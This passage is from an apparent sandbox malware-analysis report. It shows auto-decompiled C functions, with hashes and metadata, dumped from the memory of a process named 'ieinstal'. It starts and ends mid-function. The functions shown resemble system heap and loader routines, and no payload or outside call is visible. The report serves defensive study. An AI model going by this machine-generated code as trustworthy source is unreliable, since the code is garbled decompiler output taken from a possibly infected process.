                        									_t102 = E1ED851BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x1ece166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                        									break;
                        								} else {
                        									_t64 =  *(_t103 - 0x24);
                        									goto L5;
                        								}
                        								goto L13;
                        							} else {
                        								L5:
                        								_t64 = _t64 - 1;
                        								continue;
                        							}
                        						}
                        						break;
                        					}
                        					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        					__eflags = _t102;
                        					if(_t102 < 0) {
                        						__eflags = _t102 - 0xc0000100;
                        						if(_t102 == 0xc0000100) {
                        							_t83 =  *((intOrPtr*)(_t103 + 8));
                        							__eflags = _t83;
                        							if(_t83 != 0) {
                        								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                        								__eflags =  *_t83 - _t99;
                        								if( *_t83 == _t99) {
                        									_t102 = 0xc0000100;
                        									goto L19;
                        								} else {
                        									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                        									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                        									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                        									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                        										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                        										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                        											L26:
                        											_t102 = E1ED32AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        											__eflags = _t102 - 0xc0000100;
                        											if(_t102 != 0xc0000100) {
                        												goto L12;
                        											} else {
                        												_t99 = 1;
                        												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                        												goto L18;
                        											}
                        										} else {
                        											_t69 = E1ED16600( *((intOrPtr*)(_t91 + 0x1c)));
                        											__eflags = _t69;
                        											if(_t69 != 0) {
                        												goto L26;
                        											} else {
                        												_t83 =  *((intOrPtr*)(_t103 + 8));
                        												goto L18;
                        											}
                        										}
                        									} else {
                        										L18:
                        										_t102 = E1ED32C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                        										L19:
                        										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        										goto L12;
                        									}
                        								}
                        								L28:
                        							} else {
                        								E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        								 *((intOrPtr*)(_t103 - 4)) = 1;
                        								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                        								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                        								_t76 = E1ED32AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                        								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                        								__eflags = _t76 - 0xc0000100;
                        								if(_t76 == 0xc0000100) {
                        									 *((intOrPtr*)(_t103 - 0x1c)) = E1ED32C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                        								}
                        								 *((intOrPtr*)(_t103 - 4)) = _t99;
                        								E1ED32ACB();
                        							}
                        						}
                        					}
                        					L12:
                        					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                        					_t62 = _t102;
                        				}
                        				L13:
                        				return E1ED5D0D1(_t62);
                        				goto L28;
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64931cdf3c0a0612ca9204860f9b03be0be1e9c101efbbd3f6eb3622f930db2a
                        • Instruction ID: c558197fd41fab3ec42c9d13948383fdf5d49aa420ab23c9d4de7c149cbdc119
                        • Opcode Fuzzy Hash: 64931cdf3c0a0612ca9204860f9b03be0be1e9c101efbbd3f6eb3622f930db2a
                        • Instruction Fuzzy Hash: 9C5126B5D0025ADFCF15CF55C880ADEBBB6BF48B14F218655E810AB2A0C335D992CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E1ED34D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				signed int _v12;
                        				char _v176;
                        				char _v177;
                        				char _v184;
                        				intOrPtr _v192;
                        				intOrPtr _v196;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short _t42;
                        				char* _t44;
                        				intOrPtr _t46;
                        				intOrPtr _t50;
                        				char* _t57;
                        				intOrPtr _t59;
                        				intOrPtr _t67;
                        				signed int _t69;
                        
                        				_t64 = __edx;
                        				_v12 =  *0x1edfd360 ^ _t69;
                        				_t65 = 0xa0;
                        				_v196 = __edx;
                        				_v177 = 0;
                        				_t67 = __ecx;
                        				_v192 = __ecx;
                        				E1ED4FA60( &_v176, 0, 0xa0);
                        				_t57 =  &_v176;
                        				_t59 = 0xa0;
                        				if( *0x1edf7bc8 != 0) {
                        					L3:
                        					while(1) {
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t67 = _v192;
                        						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
                        						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
                        						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
                        						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
                        						_push( &_v184);
                        						_push(_t59);
                        						_push(_t57);
                        						_push(0xa0);
                        						_push(_t57);
                        						_push(0xf);
                        						_t42 = E1ED4B0B0();
                        						if(_t42 != 0xc0000023) {
                        							break;
                        						}
                        						if(_v177 != 0) {
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        						}
                        						_v177 = 1;
                        						_t44 = L1ED24620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
                        						_t59 = _v184;
                        						_t57 = _t44;
                        						if(_t57 != 0) {
                        							continue;
                        						} else {
                        							_t42 = 0xc0000017;
                        							break;
                        						}
                        					}
                        					if(_t42 != 0) {
                        						_t65 = E1ED0CCC0(_t42);
                        						if(_t65 != 0) {
                        							L10:
                        							if(_v177 != 0) {
                        								if(_t57 != 0) {
                        									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                        								}
                        							}
                        							_t46 = _t65;
                        							L12:
                        							return E1ED4B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                        						}
                        						L7:
                        						_t50 = _a4;
                        						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                        						if(_t50 != 3) {
                        							if(_t50 == 2) {
                        								goto L8;
                        							}
                        							L9:
                        							if(E1ED4F380(_t67 + 0xc, 0x1ece5138, 0x10) == 0) {
                        								 *0x1edf60d8 = _t67;
                        							}
                        							goto L10;
                        						}
                        						L8:
                        						_t64 = _t57 + 0x28;
                        						E1ED34F49(_t67, _t57 + 0x28);
                        						goto L9;
                        					}
                        					_t65 = 0;
                        					goto L7;
                        				}
                        				if(E1ED34E70(0x1edf86b0, 0x1ed35690, 0, 0) != 0) {
                        					_t46 = E1ED0CCC0(_t56);
                        					goto L12;
                        				} else {
                        					_t59 = 0xa0;
                        					goto L3;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff9924f598ae8a0e8c2e36736c15c95c05429f0722c7f6e5e63f5451f29fbdd0
                        • Instruction ID: 185dbb796994c2aa7ac816c148612364be9dbac026f32a9131daec76ee35168f
                        • Opcode Fuzzy Hash: ff9924f598ae8a0e8c2e36736c15c95c05429f0722c7f6e5e63f5451f29fbdd0
                        • Instruction Fuzzy Hash: 11413BB9A003589FEB21CF10CC90F9AB7BAEF44315F1406AAE945A7380D774ED44CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E1ED34BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                        				signed int _v8;
                        				short _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v156;
                        				short _v158;
                        				intOrPtr _v160;
                        				char _v164;
                        				intOrPtr _v168;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t45;
                        				intOrPtr _t74;
                        				signed char _t77;
                        				intOrPtr _t84;
                        				char* _t85;
                        				void* _t86;
                        				intOrPtr _t87;
                        				signed short _t88;
                        				signed int _t89;
                        
                        				_t83 = __edx;
                        				_v8 =  *0x1edfd360 ^ _t89;
                        				_t45 = _a8 & 0x0000ffff;
                        				_v158 = __edx;
                        				_v168 = __ecx;
                        				if(_t45 == 0) {
                        					L22:
                        					_t86 = 6;
                        					L12:
                        					E1ED0CC50(_t86);
                        					L11:
                        					return E1ED4B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                        				}
                        				_t77 = _a4;
                        				if((_t77 & 0x00000001) != 0) {
                        					goto L22;
                        				}
                        				_t8 = _t77 + 0x34; // 0xdce0ba00
                        				if(_t45 !=  *_t8) {
                        					goto L22;
                        				}
                        				_t9 = _t77 + 0x24; // 0x1edf8504
                        				E1ED22280(_t9, _t9);
                        				_t87 = 0x78;
                        				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
                        				E1ED4FA60( &_v156, 0, _t87);
                        				_t13 = _t77 + 0x30; // 0x3db8
                        				_t85 =  &_v156;
                        				_v36 =  *_t13;
                        				_v28 = _v168;
                        				_v32 = 0;
                        				_v24 = 0;
                        				_v20 = _v158;
                        				_v160 = 0;
                        				while(1) {
                        					_push( &_v164);
                        					_push(_t87);
                        					_push(_t85);
                        					_push(0x18);
                        					_push( &_v36);
                        					_push(0x1e);
                        					_t88 = E1ED4B0B0();
                        					if(_t88 != 0xc0000023) {
                        						break;
                        					}
                        					if(_t85 !=  &_v156) {
                        						L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
                        					}
                        					_t84 = L1ED24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
                        					_v168 = _v164;
                        					if(_t84 == 0) {
                        						_t88 = 0xc0000017;
                        						goto L19;
                        					} else {
                        						_t74 = _v160 + 1;
                        						_v160 = _t74;
                        						if(_t74 >= 0x10) {
                        							L19:
                        							_t86 = E1ED0CCC0(_t88);
                        							if(_t86 != 0) {
                        								L8:
                        								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
                        								_t30 = _t77 + 0x24; // 0x1edf8504
                        								E1ED1FFB0(_t77, _t84, _t30);
                        								if(_t84 != 0 && _t84 !=  &_v156) {
                        									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
                        								}
                        								if(_t86 != 0) {
                        									goto L12;
                        								} else {
                        									goto L11;
                        								}
                        							}
                        							L6:
                        							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
                        							if(_v164 != 0) {
                        								_t83 = _t84;
                        								E1ED34F49(_t77, _t84);
                        							}
                        							goto L8;
                        						}
                        						_t87 = _v168;
                        						continue;
                        					}
                        				}
                        				if(_t88 != 0) {
                        					goto L19;
                        				}
                        				goto L6;
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 92fcea280ba24a04396ca1ef567a127ca05e50ad4b6b44892d583b6606294c4a
                        • Instruction ID: 42d8c34ee0966e1f81f24fde59afa9d0904b681c9996df7e6cde9cc972d00aec
                        • Opcode Fuzzy Hash: 92fcea280ba24a04396ca1ef567a127ca05e50ad4b6b44892d583b6606294c4a
                        • Instruction Fuzzy Hash: B841F479E002689BCB20CF64C940FDE77B5EF45740F0106A5E909AB240DB75EE84CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E1EDCAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed int _v16;
                        				signed char _v20;
                        				intOrPtr _v24;
                        				char* _t37;
                        				void* _t47;
                        				signed char _t51;
                        				void* _t53;
                        				char _t55;
                        				intOrPtr _t57;
                        				signed char _t61;
                        				intOrPtr _t75;
                        				void* _t76;
                        				signed int _t81;
                        				intOrPtr _t82;
                        
                        				_t53 = __ecx;
                        				_t55 = 0;
                        				_v20 = _v20 & 0;
                        				_t75 = __edx;
                        				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                        				_v24 = __edx;
                        				_v12 = 0;
                        				if((_t81 & 0x01000000) != 0) {
                        					L5:
                        					if(_a8 != 0) {
                        						_t81 = _t81 | 0x00000008;
                        					}
                        					_t57 = E1EDCABF4(_t55 + _t75, _t81);
                        					_v8 = _t57;
                        					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                        						_t76 = 0;
                        						_v16 = _v16 & 0;
                        					} else {
                        						_t59 = _t53;
                        						_t76 = E1EDCAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                        						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                        							_t47 = E1EDCAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                        							_t61 = _v20;
                        							if(_t61 != 0) {
                        								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                        								if(E1EDACB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                        									L1ED277F0(_t53, 0, _t76);
                        									_t76 = 0;
                        								}
                        							}
                        						}
                        					}
                        					_t82 = _v8;
                        					L16:
                        					if(E1ED27D50() == 0) {
                        						_t37 = 0x7ffe0380;
                        					} else {
                        						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						E1EDC131B(_t53, _t76, _t82, _v16);
                        					}
                        					return _t76;
                        				}
                        				_t51 =  *(__ecx + 0x20);
                        				_v20 = _t51;
                        				if(_t51 == 0) {
                        					goto L5;
                        				}
                        				_t81 = _t81 | 0x00000008;
                        				if(E1EDACB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                        					_t55 = _v12;
                        					goto L5;
                        				} else {
                        					_t82 = 0;
                        					_t76 = 0;
                        					_v16 = _v16 & 0;
                        					goto L16;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction ID: 6f5ad9d01abca1ae57f34c614265c2024d7ca4ba4b0223d0b34a7205690cd341
                        • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                        • Instruction Fuzzy Hash: 50310E76F002956BDB058A65C850BAFFBABEF802D0F11826DE902E7291DB70DD00CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E1ED18A0A(intOrPtr* __ecx, signed int __edx) {
                        				signed int _v8;
                        				char _v524;
                        				signed int _v528;
                        				void* _v532;
                        				char _v536;
                        				char _v540;
                        				char _v544;
                        				intOrPtr* _v548;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t44;
                        				void* _t46;
                        				void* _t48;
                        				signed int _t53;
                        				signed int _t55;
                        				intOrPtr* _t62;
                        				void* _t63;
                        				unsigned int _t75;
                        				signed int _t79;
                        				unsigned int _t81;
                        				unsigned int _t83;
                        				signed int _t84;
                        				void* _t87;
                        
                        				_t76 = __edx;
                        				_v8 =  *0x1edfd360 ^ _t84;
                        				_v536 = 0x200;
                        				_t79 = 0;
                        				_v548 = __edx;
                        				_v544 = 0;
                        				_t62 = __ecx;
                        				_v540 = 0;
                        				_v532 =  &_v524;
                        				if(__edx == 0 || __ecx == 0) {
                        					L6:
                        					return E1ED4B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                        				} else {
                        					_v528 = 0;
                        					E1ED1E9C0(1, __ecx, 0, 0,  &_v528);
                        					_t44 = _v528;
                        					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                        					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                        					_t46 = 0xa;
                        					_t87 = _t81 - _t46;
                        					if(_t87 > 0 || _t87 == 0) {
                        						 *_v548 = 0x1ece1180;
                        						L5:
                        						_t79 = 1;
                        						goto L6;
                        					} else {
                        						_t48 = E1ED31DB5(_t62,  &_v532,  &_v536);
                        						_t76 = _v528;
                        						if(_t48 == 0) {
                        							L9:
                        							E1ED43C2A(_t81, _t76,  &_v544);
                        							 *_v548 = _v544;
                        							goto L5;
                        						}
                        						_t62 = _v532;
                        						if(_t62 != 0) {
                        							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                        							_t53 =  *_t62;
                        							_v528 = _t53;
                        							if(_t53 != 0) {
                        								_t63 = _t62 + 4;
                        								_t55 = _v528;
                        								do {
                        									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                        										if(E1ED18999(_t63,  &_v540) == 0) {
                        											_t55 = _v528;
                        										} else {
                        											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                        											_t55 = _v528;
                        											if(_t75 >= _t83) {
                        												_t83 = _t75;
                        											}
                        										}
                        									}
                        									_t63 = _t63 + 0x14;
                        									_t55 = _t55 - 1;
                        									_v528 = _t55;
                        								} while (_t55 != 0);
                        								_t62 = _v532;
                        							}
                        							if(_t62 !=  &_v524) {
                        								L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                        							}
                        							_t76 = _t83 & 0x0000ffff;
                        							_t81 = _t83 >> 0x10;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e710f782edf31772f3444948b3489b91f6ac6bed052bd6cd05f942bab38a65b6
                        • Instruction ID: 0f6020bbc49eb0805248808173cbbda51a8a8cb120a6c806fafa06f677805fa0
                        • Opcode Fuzzy Hash: e710f782edf31772f3444948b3489b91f6ac6bed052bd6cd05f942bab38a65b6
                        • Instruction Fuzzy Hash: EF4182B8A0026D9BDB24CF15E889AA9F7F5EB54300F1147E9D8189B241E770DE80CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E1EDCFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t29;
                        				char* _t32;
                        				char* _t43;
                        				signed int _t80;
                        				signed int* _t84;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t56 = __edx;
                        				_t84 = __ecx;
                        				_t80 = E1EDCFD4E(__ecx, __edx);
                        				_v12 = _t80;
                        				if(_t80 != 0) {
                        					_t29 =  *__ecx & _t80;
                        					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                        					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                        						E1EDD0A13(__ecx, _t80, 0, _a4);
                        						_t80 = 1;
                        						if(E1ED27D50() == 0) {
                        							_t32 = 0x7ffe0380;
                        						} else {
                        							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        						}
                        						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        							_push(3);
                        							L21:
                        							E1EDC1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                        						}
                        						goto L22;
                        					}
                        					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                        						_t80 = E1EDD2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                        						if(_t80 != 0) {
                        							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                        							_t77 = _v8;
                        							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                        								E1EDCC8F7(_t66, _t77, 0);
                        							}
                        						}
                        					} else {
                        						_t80 = E1EDCDBD2(__ecx[0xb], _t74, __edx, _a4);
                        					}
                        					if(E1ED27D50() == 0) {
                        						_t43 = 0x7ffe0380;
                        					} else {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                        						goto L22;
                        					} else {
                        						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                        						goto L21;
                        					}
                        				} else {
                        					_push(__ecx);
                        					_push(_t80);
                        					E1EDCA80D(__ecx[0xf], 9, __edx, _t80);
                        					L22:
                        					return _t80;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction ID: 99a7335c0f0fd205e67fdc209aa862e192c4f55a95aee7ddf89650ea80ef5673
                        • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                        • Instruction Fuzzy Hash: D9310836700680AFD3128765C854F9B7BEAEFC5690F14469DE9858B382DB74EC81C720
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 70%
                        			E1EDCEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                        				signed int _v8;
                        				char _v12;
                        				intOrPtr _v15;
                        				char _v16;
                        				intOrPtr _v19;
                        				void* _v28;
                        				intOrPtr _v36;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t26;
                        				signed int _t27;
                        				char* _t40;
                        				unsigned int* _t50;
                        				intOrPtr* _t58;
                        				unsigned int _t59;
                        				char _t75;
                        				signed int _t86;
                        				intOrPtr _t88;
                        				intOrPtr* _t91;
                        
                        				_t75 = __edx;
                        				_t91 = __ecx;
                        				_v12 = __edx;
                        				_t50 = __ecx + 0x30;
                        				_t86 = _a4 & 0x00000001;
                        				if(_t86 == 0) {
                        					E1ED22280(_t26, _t50);
                        					_t75 = _v16;
                        				}
                        				_t58 = _t91;
                        				_t27 = E1EDCE815(_t58, _t75);
                        				_v8 = _t27;
                        				if(_t27 != 0) {
                        					E1ED0F900(_t91 + 0x34, _t27);
                        					if(_t86 == 0) {
                        						E1ED1FFB0(_t50, _t86, _t50);
                        					}
                        					_push( *((intOrPtr*)(_t91 + 4)));
                        					_push( *_t91);
                        					_t59 =  *(_v8 + 0x10);
                        					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                        					_push(0x8000);
                        					_t11 = _t53 - 1; // 0x0
                        					_t12 = _t53 - 1; // 0x0
                        					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                        					E1EDCAFDE( &_v12,  &_v16);
                        					asm("lock xadd [eax], ecx");
                        					asm("lock xadd [eax], ecx");
                        					E1EDCBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                        					_t55 = _v36;
                        					_t88 = _v36;
                        					if(E1ED27D50() == 0) {
                        						_t40 = 0x7ffe0388;
                        					} else {
                        						_t55 = _v19;
                        						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        					}
                        					if( *_t40 != 0) {
                        						E1EDBFE3F(_t55, _t91, _v15, _t55);
                        					}
                        				} else {
                        					if(_t86 == 0) {
                        						E1ED1FFB0(_t50, _t86, _t50);
                        						_t75 = _v16;
                        					}
                        					_push(_t58);
                        					_t88 = 0;
                        					_push(0);
                        					E1EDCA80D(_t91, 8, _t75, 0);
                        				}
                        				return _t88;
                        			}

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction ID: 5b09cd355b37ad4f6322a42f81c9614cfd6f37339ced93667f59a66d4785426b
                        • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                        • Instruction Fuzzy Hash: 6F3181766147469FC719CF24C880A6BB7AAFFC4250F044A2EF95687684DB31E809CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E1ED869A6(signed short* __ecx, void* __eflags) {
                        				signed int _v8;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				signed short _v28;
                        				signed int _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				char* _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				signed int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				char _v72;
                        				signed short* _v76;
                        				signed int _v80;
                        				char _v84;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t68;
                        				intOrPtr _t73;
                        				signed short* _t74;
                        				void* _t77;
                        				void* _t78;
                        				signed int _t79;
                        				signed int _t80;
                        
                        				_v8 =  *0x1edfd360 ^ _t80;
                        				_t75 = 0x100;
                        				_v64 = _v64 & 0x00000000;
                        				_v76 = __ecx;
                        				_t79 = 0;
                        				_t68 = 0;
                        				_v72 = 1;
                        				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                        				_t77 = 0;
                        				if(L1ED16C59(__ecx[2], 0x100, __eflags) != 0) {
                        					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        					if(_t79 != 0 && E1ED86BA3() != 0) {
                        						_push(0);
                        						_push(0);
                        						_push(0);
                        						_push(0x1f0003);
                        						_push( &_v64);
                        						if(E1ED49980() >= 0) {
                        							E1ED22280(_t56, 0x1edf8778);
                        							_t77 = 1;
                        							_t68 = 1;
                        							if( *0x1edf8774 == 0) {
                        								asm("cdq");
                        								 *(_t79 + 0xf70) = _v64;
                        								 *(_t79 + 0xf74) = 0x100;
                        								_t75 = 0;
                        								_t73 = 4;
